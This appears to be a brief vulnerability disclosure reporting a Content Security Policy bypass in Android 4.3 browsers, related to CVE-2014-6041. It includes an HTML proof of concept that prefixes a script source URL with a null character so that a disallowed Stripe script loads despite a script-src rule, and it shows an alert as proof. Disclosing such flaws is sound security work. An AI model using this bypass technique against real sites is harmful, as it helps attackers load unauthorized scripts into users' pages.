I've found a Content Security Policy bypass similar and related to the same origin policy bypass in CVE-2014-6041. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041 I've tested this on an Android 4.3 tablet running a bunch of different browsers, including Inbrowser, Firefox, and the default Android browser on an emulator for Android 4.3.1. HTML PoC: <input type=button value="test" onclick=" a=document.createElement('script'); a.id='AA'; a.src='\u0000https://js.stripe.com/v2/&apos;; document.body.appendChild(a); setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{ alert(2);}}, 400); return false;"> The content security policy rule that should block this is script-src 'self' https://js.stripe.com/v3/ ; The PoC worked if you see a popup containing stripes e(){} object. I set the Timeout kind of short, so you may have to press the button twice before you see the popup. I have a PoC test page at ejj.io/test.php Cheers, Evan J